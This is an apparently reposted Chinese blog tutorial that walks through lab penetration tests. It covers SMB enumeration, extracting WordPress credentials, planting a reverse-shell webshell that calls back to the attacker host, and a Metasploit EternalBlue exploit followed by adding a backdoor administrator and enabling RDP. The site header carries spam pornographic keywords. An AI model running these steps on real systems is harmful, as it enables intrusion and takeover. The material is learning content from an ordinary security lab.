日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

SMB漏洞

發布時間:2024/9/30 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SMB漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

一,SMB信息泄露

充電站:

二,MS17-010 (永恒之藍) 復現


一,SMB信息泄露

靶場:192.168.11.167

攻擊機:kali 192.168.11.165

信息探測:

nmap -sV 192.168.11.167

可以看到開放了,22 ssh端口,139,445的smb服務端口,以及3306的mysal服務

掃描更詳細的信息:

nmap -A -v -T4 192.168.11.167-A : 探測所有信息 -v : 把探測信息詳細輸出 -T4: nmap使用最大線程數

對smb協議進行漏洞分析:

針對SMB協議,使用空口令,嘗試登錄,并查看敏感文件,下載查看

smbclient -L 192.168.11.167

掃到三個設備,print$ 是一個打印機設備,share$ 是一個共享文件夾,IPC$是一個空鏈接

分別查看 這三個設備上有什么有用的信息,發現除了share$ 之外我們沒有查看的權限

smbclient '\\192.168.11.167\print$' smbclient '\\192.168.11.167\share$' smbclient '\\192.168.11.167\IPC$'

將deets.txt 、robots.txt等文件 get下來

get deets.txtget robots.txt

新打開一個運行窗口,查看文件的內容,在查看deets.txt文件時,發現了一個 莫名的password: 12345 先記下來

進一步查看其它文件,進入wordpress文件夾內:

把wordpress的配置文件 get下來,

get wp-config.php

在終端中打開wp-config.php文件

gedit wp-config.php

找到了 wordpress的 username 和 password ,不知道這個username和password是不是其它服務端口的登錄 賬號和密碼

嘗試一下:

mysql ,不允許遠程登錄

ssh:密碼錯誤

嘗試失敗,

嘗試一下看是否具有SMB遠程溢出的漏洞:

根據剛開始掃描到的 smb的版本信息去 探測有沒有遠程溢出漏洞

searchsploit Samba smbd 3.X - 4.Xsearchsploit Samba smbd 4.3.11-Ubunt

沒有smb溢出漏洞

?

針對HTTP協議弱點進行分析:

使用dirb進行后臺探測:

掃到了wordpress的后臺管理界面

使用我們剛才在 wp-config.php中的賬戶和密碼登錄:

這里可以上傳webshell 木馬,進行提權

首先制作一個 webshell,這里用 kali的msfvenom 生成源代碼:

?

這里制作了一個,反彈到 攻擊機 192.168.11.165? 4444端口的木馬

復制源代碼保存 在桌面的 webshell.php 中

啟動監聽

msfconsole

然后進行配置:

這里 配置了監聽 192.168.11.165 的4444端口

啟動:

run

然后去wordpress 的后臺管理界面 apparent》edit 》404.php,上傳我們剛才制作的webshell代碼:

然后點擊左下角的提交,

然后訪問404 界面 使代碼運行:

瀏覽器訪問:http://192.168.11.167/wordpress/wp-content/themes/twentyfifteen/404.php?然后webshell就會執行

然后我們就會看到方才監聽的端口開始顯示了信息:

輸入 shell 。id 查看當前用戶的權限

優化一下 命令窗口:

python -c "import pty; pty.spawn('/bin/bash')"

看一下用戶組:

看到一個 togie用戶

切換到togie用戶,并嘗試提升為root權限:輸入我們剛開始開 deets.txt 文件中獲得的密碼 12345,成功

至此我們已經獲取了最高權限完全攻陷了該服務器

查看/root目錄 看到了flag.txt文件

?

充電站:

1,什么是SMB?

SMB協議作為一種局域網文件共享傳輸協議,常被用來作為共享文件安全傳輸研究的平臺,很流行的協議,它能使你共享文件,磁盤,目錄,打印機,甚至網絡端口

服務器消息塊,又稱網絡文件共享系統,一種應用層網絡傳輸協議,由微軟開發,主要功能是使網絡上的機器能夠共享計算機文件、打印機、串行端口和通訊等資源。它也提供經認證的行程間通信機能。它主要用在裝有Microsoft Windows的機器上,在這樣的機器上被稱為Microsoft Windows Network。

經過Unix服務器廠商重新開發后,它可以用于連接Unix服務器和Windows客戶機,執行打印和文件共享等任務


2,什么是SMB遠程溢出的漏洞,怎么利用?

官方名稱:MS17-010 (永恒之藍勒索病毒)附上一篇,SMB遠程溢出利用的博文:https://www.shystartree.com/2018/07/12/%E4%B8%80%E6%AC%A1SMB%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%BB%8F%E5%8E%86%EF%BC%88MS17-010%20EternalBlue%20%EF%BC%89/

MS17-010是一個很出名的漏洞,存在于win 7中 b站上有好多介紹利用視頻,不再贅述

4,msfvenom是什么?

Metasploit介紹

幾乎每一個玩滲透的人都會接觸到Metasploit Framework,簡稱msf。這是一個滲透測試框架,用ruby語言寫的,該框架集成了很多可用的exploit,比如著名的ms08_067等,

msfconsole

這是啟動msf的終端命令,注意因為現在msf默認的數據庫是postgresql,所以在啟動msf之前需要先啟動postgresql數據庫。 在終端中輸入msfconsole即可啟動msf

msfvenom

在之前的msf版本中會有msfencode,msfpayload等工具,學習成本比較高,現在這些工具已經被廢棄了。取而代之的是msfvenom工具,可以看做它是msfencode與msfpayload的結合版,它允許你自行生成想要的payload

?

二,MS17-010 (永恒之藍) 復現

永恒之藍漏洞剛出來的時候,當時很多人是用Shadow Brokers泄露的NSA原生攻擊工具來測試,通過“ Fuzzbunch + Eternalblue 組合拳 ”,雖然可以做出getshell效果,但是整個實現過程非常麻煩,不太適合安全新手進行快速實踐。

到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的滲透測試代碼,針對Win7和Server2008可以實現getshell,幾分鐘內就可以將完成整個漏洞復現過程。

漏洞環境復現:

攻擊機:kali 2019 192.168.11.165

靶機: windows 7 192.168.11.151

?

啟動 metasploit框架,并搜尋有關 MS17-010 的相關利用模塊:

msfconsolesearch ms17_010

可以看到有5 個可以利用的模塊

這里可以得到兩個工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之藍掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恒之藍滲透代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行滲透。

我們先使用 1號 進行 掃描,看靶機上是否有 MS17-010漏洞

若有 ,再用? 2 號模塊進行攻擊

使用模塊 msf > use auxiliary/scanner/smb/smb_ms17_010 設置目標IP或網段 msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.11.151 執行掃描 msf auxiliary(smb_ms17_010) > run

可以看到存在 永恒之藍漏洞?(測試過程中,Win7需關閉防火墻)

用? 2 號模塊進行攻擊

使用模塊 msf > use exploit/windows/smb/ms17_010_eternalblue 查看可設置的選項 msf exploit(ms17_010_eternalblue) > show options 設置滲透目標ip msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199 執行滲透 msf exploit(ms17_010_eternalblue) > exploit

然后就取得了 靶機的控制權;

(如果你的命令行中出現亂碼,那是因為 win和linux的字符格式不兼容,在kali的終端上方的菜單欄中 終端》 設置字符編碼》中文簡體-GBK)

然后創建用戶,賦予用戶管理員權限,開啟靶機的遠程桌面功能,連接靶機桌面

創建用戶名密碼 blue/blue net user blue blue /add 將用戶blue添加入管理組 net localgroup administrators blue /add 開啟遠程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

新開一個終端窗口:

Kali遠程桌面連接Win7 rdesktop 192.168.11.151:3389

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

總結

以上是生活随笔為你收集整理的SMB漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。